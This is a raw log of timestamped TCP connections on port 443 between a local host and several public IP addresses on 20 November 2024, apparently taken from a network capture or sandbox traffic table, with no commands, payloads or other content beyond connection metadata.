                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.248218060 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.620274067 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.620291948 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.620343924 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.620362043 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.620415926 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.625525951 CET49716443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.625541925 CET44349716205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.627717972 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.627775908 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.860085011 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.860126972 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.860488892 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.860985041 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:24.861005068 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:25.637027979 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:25.637054920 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:25.637111902 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:25.641155005 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:25.641180992 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.026159048 CET44349708173.222.162.60192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.026264906 CET49708443192.168.2.12173.222.162.60
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.087038040 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.087120056 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.087212086 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.088943005 CET49715443192.168.2.12205.139.111.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.088965893 CET44349715205.139.111.12192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.234059095 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.234100103 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.234272003 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.234390020 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.234404087 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.629005909 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.629311085 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.629339933 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.630491018 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.630563974 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.632057905 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.632142067 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.682540894 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.682571888 CET44349719142.250.181.68192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:26.731770992 CET49719443192.168.2.12142.250.181.68
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.072767973 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.072830915 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.078350067 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.078361034 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.078660011 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.122162104 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.130928040 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.171330929 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.542270899 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.542977095 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.542993069 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.544120073 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.544163942 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.549155951 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.549247980 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.549370050 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.591341019 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.596354008 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.596364975 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.598294973 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.598368883 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.598483086 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.598596096 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.598596096 CET49720443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.598618031 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.598629951 CET4434972023.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.633450031 CET49722443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.633492947 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.633738041 CET49722443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.634147882 CET49722443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.634170055 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:27.642489910 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.137085915 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.137144089 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.137206078 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.137223005 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.137275934 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.137428045 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.137437105 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.145414114 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.145515919 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.145533085 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.160249949 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.160295010 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.160345078 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.160362959 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.160443068 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.258876085 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.310529947 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.310549021 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.343619108 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.343667030 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.343740940 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.343909025 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.343975067 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344063997 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344136953 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344196081 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344239950 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344297886 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344305992 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344577074 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344780922 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344799995 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344888926 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344897032 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344918013 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.344939947 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.345320940 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.345339060 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.345494986 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.345504999 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.345731020 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.345745087 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.346004009 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.346019983 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.346369028 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.346378088 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.346554041 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.346566916 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.351733923 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.351798058 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.351815939 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.351829052 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.351953983 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.360222101 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.368565083 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.368611097 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.368705034 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.368720055 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.368768930 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.376895905 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.379098892 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.379144907 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.379276037 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.379522085 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.379537106 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.385194063 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.385241985 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.385258913 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.385293007 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.385523081 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.385627031 CET49721443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:28.385642052 CET44349721104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.124032021 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.124111891 CET49722443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.125722885 CET49722443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.125734091 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.126331091 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.128398895 CET49722443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.171328068 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.578921080 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.620955944 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.625680923 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.626076937 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.629626989 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.639225960 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.668212891 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.669934988 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.671992064 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.672024965 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.683553934 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.687561035 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.687642097 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.687798023 CET49722443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.694214106 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.721793890 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.745358944 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.804259062 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.804286957 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.804379940 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.804387093 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.804759979 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.804789066 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.804971933 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.804977894 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805136919 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805145979 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805458069 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805464029 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805582047 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805597067 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805602074 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805651903 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805653095 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805706978 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.805957079 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.806008101 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.806184053 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.806229115 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.806736946 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.806793928 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.807152033 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.807207108 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.808420897 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.808536053 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.808799028 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.808890104 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.808909893 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.808981895 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.808984041 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.809026003 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.809041023 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.809927940 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.810000896 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.810350895 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.810451031 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.810980082 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.811077118 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.811598063 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.811794043 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.811801910 CET44349726104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.811891079 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.811897039 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.811902046 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.811939001 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.811949968 CET44349725104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.812005043 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.812011957 CET44349728104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.812046051 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.812058926 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.812093973 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.812102079 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.812200069 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.812206984 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.821003914 CET49722443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.821003914 CET49722443192.168.2.1223.218.208.109
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.821037054 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.821049929 CET4434972223.218.208.109192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.860754967 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.860754967 CET49726443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.860778093 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.860778093 CET49725443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.860778093 CET49728443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.860784054 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:29.860786915 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.169516087 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.169589996 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.169619083 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.169631004 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.169650078 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.169660091 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.169686079 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.169696093 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.169725895 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.175537109 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.185430050 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.185506105 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.185543060 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.185553074 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.185568094 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.185596943 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.185632944 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.185638905 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.185672045 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.186706066 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.186738968 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.186750889 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.186770916 CET44349724104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.186810017 CET49724443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.188530922 CET44349726104.16.103.112192.168.2.12
